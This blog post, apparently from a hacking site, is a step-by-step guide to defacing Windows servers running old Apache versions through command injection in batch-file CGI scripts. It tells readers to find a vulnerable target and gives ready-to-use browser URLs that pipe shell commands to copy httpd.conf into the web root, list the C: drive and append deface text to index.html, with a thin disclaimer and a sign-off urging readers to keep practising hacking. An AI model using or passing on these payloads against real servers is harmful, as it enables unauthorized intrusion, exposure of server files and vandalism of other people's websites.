Hack and Deface Apache WebServer.

Hack and Deface Apache WebServer.Are you really interested in hacking a server or you just want to learn about it but without doing a realtime practical you cannot get hands on a the topic of hacking a server it's my opinion but i'am not asking you to perform any such activity.It is upto you.

For hacking a webserver the first step would be to find a server that is vulnerable.

General terms for newbies:-

Server:-A computer connected to internet

Defacing:-Defacing a server means(general meaning) to disturb the contents of the webpage that the server is running.

In my case it is Apache 1.3.23(a software that runs on a server)

We are going to deface the server running Apache 1.3.23.

Let's start........................

You don't need any tool to make the deface. This vulnerability can be exploited

via a browser.

NOTE:If this vulnerability does'nt work that means the vulnerability have been patched on the server.You can try anyother old server.

When a request for a DOS batch file (.bat or.cmd) is sent to an Apache

web server, the server will spawn a shell interpreter (cmd.exe by

default) and will run the script with the parameters sent to it by the

user. Because no proper validation is done on the input, it is possible

to send a pipe character ('|') with commands appended to it as

parameters to the CGI script, and the shell interpreter will execute

them.

1Step:-First find a server running Apache1.3.23 or Apache 2.0.28-BETA  running on Windows.

2step:-Now when we have found the server we need view thehttpd.conf file residing in the /conf directory of the

Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:

<http://www.target.com/cgi-bin/test-cgi.bat?>|copy+..\conf\httpd.conf+..\htdocs\httpd.conf

3STEP:-To view the contents of the C:\ drive create in /htdocs a file containing

the directory listing of the drive.

To do this, write in your browser:

<http://www.target.com/cgi-bin/test-cgi.bat?>|dir+c:+>..\htdocs\dir.txt

To make your deface you will use the echo command.

To do this, write in your browser:

<http://www.target.com/cgi-bin/test-cgi.bat?>|echo+Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in the virtual web root directory.

Thats how this vulnerability can be exploited...

This article is not for the newbies as you should be familiar with the terms mentioned.Anyway I'am providing a more descriptive form as an example.

Example:

1)

<http://TARGET/cgi-bin/test-cgi.bat?>|copy+..\conf\httpd.conf+..\htdocs\httpd.

conf

This request will copy the httpd.conf file residing in the /conf directory

of the Apache

installation, into the virtual web root where it can be viewed by any user.

2) <http://TARGET/cgi-bin/test-cgi.bat?>|echo+Foobar+>>+..\htdocs\index.html

This will append the string "Foobar" to the index.html file residing in the

virtual

web root directory.

3) <http://TARGET/cgi-bin/test-cgi.bat?>|dir+c:+>..\htdocs\dir.txt

This will create a file containing the directory listing of the C: drive,

and will put the file in the virtual web root, where any user can read it.

** Notes:

1) Url-Decoding is not provided by Apache except for the '+' character which

is substituted by a space character.

2) Spilling the output into the STDOUT would most likely cause Apache to

write an

error message since it expects the STDOUT of a CGI script to have an HTTP

response format

(potential HTTP headers followed by a mandatory blank line followed by a

response body).

Therefore in order to view the result of a command, it is recommended that

you redirect

the output to a file under the web server's virtual root.

Darksidehackers.blogspot.om

By Ankit Mishra

Keep Practicing Hacking